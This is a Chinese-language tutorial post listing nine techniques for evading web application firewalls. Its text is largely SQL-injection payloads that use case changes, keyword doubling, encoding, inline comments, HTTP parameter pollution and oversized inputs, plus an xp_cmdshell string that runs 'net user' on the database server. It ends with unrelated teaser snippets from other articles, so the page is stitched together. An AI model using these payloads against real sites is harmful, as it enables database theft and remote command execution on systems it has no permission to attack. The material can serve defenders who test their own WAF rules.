這9種方式可以繞過Web應用程式防火牆

2021-10-12 16:41:45 字數 3680 閱讀 2967

web應用程式防火牆(waf)的主要作用是過濾,監控和阻止各類進出web應用程式的http流量。waf區別於常規防火牆,因為waf能夠過濾特定web應用程式的內容,而常規防火牆充當的則是伺服器之間的安全門。通過檢查http流量,它可以防止源自web應用安全漏洞的攻擊,如sql注入,xss,檔案包含和安全配置錯誤。

web應用程式防火牆waf是如何工作的?

如何繞過waf?

1. 當我們在目標url進行sql注入測試時,可以通過修改注入語句中字母的大小寫來觸發waf保護情況。如果waf使用區分大小寫的黑名單,則更改大小寫可能會幫我們成功繞過waf的過濾。

union select 1,2,3,4
2. 關鍵字替換(在關鍵字中間可插入將會被waf過濾的字元) – 例如select可插入變成sel

uniunionon selselectect 1,2,3,4
3. 編碼

4. 使用注釋

在攻擊字串中插入注釋。例如,/*!select*/ 這樣waf可能就會忽略該字串,但它仍會被傳遞給目標應用程式並交由mysql資料庫處理。

index.php?page_id=-15 %55nion/**/%53elect 1,2,3,4     'union%a0select pass from users#  index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3    ?page_id=null%0a/**//*!50000%55nion*//*yoyu*/all/**/%0a/*!%53elect*/%0a/*nnaa*/+1,2,3,4…
5. 某些函式或命令,因為waf的過濾機制導致我們無法使用。那麼,我們也可以嘗試用一些等價函式來替代它們。

hex()、bin() ==> ascii()   sleep() ==>benchmark()   concat_ws()==>group_concat()  substr((select 'password'),1,1) = 0x70    strcmp(left('password',1), 0x69) = 1      strcmp(left('password',1), 0x70) = 0    strcmp(left('password',1), 0x71) = -1 mid()、substr() ==> substring()  @@user ==> user()  @@datadir ==> datadir()
6. 使用特殊符號

這裡我把非字母數字的字元都規在了特殊符號一類,特殊符號有特殊的含義和用法。

+ ` symbol: select `version()`; + +- :select+id-1+1.from users; + @:select@^1.from users; +mysql function() as *** +`、~、!、@、%、()、、.、-、+ 、|、%00 示例

『se』+』lec』+』t』 %s%e%l%e%c%t 1 1.aspx?id=1;exec(『ma』+'ster..x』+'p_cm』+'dsh』+'ell 」net user」』) ' or --+2=- -!!!'2   id=1+(uni)(on)+(sel)(ect)

7. http引數控制

通過提供多個引數=相同名稱的值集來混淆waf。例如 or 『1』=』1′ — 『在某些情況下(例如使用apache/php),應用程式將僅解析最後(第二個) id= 而waf只解析第乙個。在應用程式看來這似乎是乙個合法的請求,因此應用程式會接收並處理這些惡意輸入。如今,大多數的waf都不會受到http引數汙染(hpp)的影響,但仍然值得一試。

/?id=1;select+1,2,3+from+users+where+id=1—    /?id=1;select+1&id=2,3+from+users+where+id=1—    /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
hpp又稱做重複引數汙染,最簡單的就是?uid=1&uid=2&uid=3,對於這種情況,不同的web伺服器處理方式如下:

這種方法是http分割注入,同crlf有相似之處(使用控制字元%0a、%0d等執行換行)

rfc2396定義了以下字元:

unreserved: a-z, a-z, 0-9 and _ . ! ~ * ' () reserved : ; / ? : @ & = + $ , unwise : | \ ^ [ ] `不同的web伺服器處理處理構造得特殊請求時有不同的邏輯:以魔術字元%為例,asp/asp.net會受到影響。

8. 緩衝區溢位

waf和其他所有的應用程式一樣也存在著各種缺陷和漏洞。如果出現緩衝區溢位的情況,那麼waf可能就會崩潰,即使不能**執行那也會使waf無法正常執行。這樣,waf的安全防護自然也就被瓦解了。

?id=1 and (select 1)=(select 0xa*1000)+union+select+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
9. 整合繞過

當使用單一的方式無法繞過時,我們則可以靈活的將多種方式結合在一起嘗試。

如何通過濫用SSL TLS繞過Web應用程式防火牆

近些年來,web安全已經逐漸變成了it安全領域裡非常重要的乙個部分。web應用的優勢就在於開發人員可以在較短的時間內整合各種關鍵服務,而且 維護難度也比傳統的桌面端應用程式要低很多。除了設計新的web標準之外,企業對web應用的安全需求也在不斷變化。在這篇文章中,我們將跟大家介紹一種 針對防火牆的新...

web網頁,繞過登入的兩種方式

繞過登陸,訪問登陸後的頁面 方式一抓包獲取cookie import requests import urllib3 urllib3.disable warnings s requests.session s.verify false h body r s.post url,json body,he...

部署WEB應用的三種方式

這種方式通常是用於開發過程中。在真正的專案實施中可能會受到限制 當使用租借的 或他人的 web伺服器時,該伺服器所在的碟符如果存在許可權控制,則不能夠將web應用程式拷貝到該碟符中,此時就不能使用這種方式部署專案,只能使用下列方式。tomcat安裝目錄下的conf目錄用於存放tomcat的配置檔案,...